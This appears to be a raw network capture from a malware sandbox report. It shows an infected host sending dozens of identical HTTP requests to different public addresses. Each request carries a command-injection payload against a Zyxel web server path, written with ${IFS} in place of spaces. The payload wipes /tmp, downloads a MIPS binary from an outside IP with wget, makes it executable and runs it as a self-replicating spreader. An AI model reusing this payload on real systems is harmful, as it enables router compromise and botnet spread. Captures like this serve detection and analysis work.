                              Mar 31, 2024 08:41:48.106239080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6708192.168.2.135973689.121.145.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.111824989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6709192.168.2.135125243.238.83.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.111850977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6710192.168.2.1340526134.132.62.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.111927986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6711192.168.2.1334654117.186.233.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112009048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6712192.168.2.135937223.58.89.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112067938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6713192.168.2.134148223.59.74.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112107038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6714192.168.2.1334550223.61.137.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112185001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6715192.168.2.134447679.21.47.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112262011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6716192.168.2.1360964209.216.118.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112298965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6717192.168.2.133583493.71.230.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112355947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6718192.168.2.1344304129.150.233.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112402916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6719192.168.2.1359386162.236.168.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112457991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6720192.168.2.1339672136.118.143.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112519979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6721192.168.2.135645880.122.75.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112562895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6722192.168.2.1341082159.199.248.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112629890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6723192.168.2.1344222193.188.51.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112657070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6724192.168.2.1348916117.231.32.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112720013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6725192.168.2.1342340203.9.249.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112807989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6726192.168.2.1360748162.56.225.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112850904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6727192.168.2.1349278125.55.133.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112906933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6728192.168.2.1349810216.73.62.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.112968922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6729192.168.2.135130898.18.94.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.113049984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6730192.168.2.1345560186.181.98.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.113085985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6731192.168.2.133925879.193.229.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.113143921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6732192.168.2.13371668.130.35.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.113205910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6733192.168.2.1356678200.19.58.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:49.113269091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6734192.168.2.1354878223.216.153.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:50.117963076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6735192.168.2.1338964192.171.125.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:50.118000031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6736192.168.2.1352888144.177.73.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:50.118052006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6737192.168.2.13331548.210.241.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:50.118102074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6738192.168.2.134055060.193.206.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:50.118150949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6739192.168.2.1340354221.239.54.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:50.118243933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6740192.168.2.1358984158.79.193.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:50.118293047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6741192.168.2.1333136116.134.157.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127393961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6742192.168.2.1352900104.86.157.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127439976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6743192.168.2.1353286114.197.165.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127487898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6744192.168.2.1341380166.45.210.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127537966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6745192.168.2.1335730143.216.117.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127592087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6746192.168.2.134115464.110.99.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127629995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6747192.168.2.1356880132.80.197.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127662897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6748192.168.2.1344966111.115.69.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127727032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6749192.168.2.1337632175.36.159.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127759933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6750192.168.2.1349156210.43.66.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127835989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6751192.168.2.1341054122.255.65.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127876997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6752192.168.2.1333356139.244.139.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127928019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6753192.168.2.135044237.207.66.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127969027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6754192.168.2.1337092188.138.173.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.127990007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6755192.168.2.1333000128.153.185.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128029108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6756192.168.2.133590834.89.183.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128073931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6757192.168.2.1355624135.55.138.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128109932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6758192.168.2.133979475.125.0.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128139973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6759192.168.2.135580470.42.47.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128168106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6760192.168.2.133845432.254.194.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128206968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6761192.168.2.1334148113.69.71.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128269911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6762192.168.2.1352688181.59.247.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128309965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6763192.168.2.135486493.231.223.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128353119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6764192.168.2.1342720211.124.154.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128391027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6765192.168.2.134200623.148.175.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128427029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6766192.168.2.13434228.60.149.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128501892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6767192.168.2.135164486.116.126.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128537893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6768192.168.2.1335164202.52.251.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128580093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6769192.168.2.1358292183.126.145.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128645897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6770192.168.2.1338116203.160.94.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128670931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6771192.168.2.1341248213.233.235.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128695965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6772192.168.2.1357010170.89.148.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128746033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6773192.168.2.133369496.135.12.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128765106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6774192.168.2.134984468.56.216.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128827095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6775192.168.2.135868431.160.89.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:51.128837109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6776192.168.2.135669850.60.2.74443
                              TimestampBytes transferredDirectionData
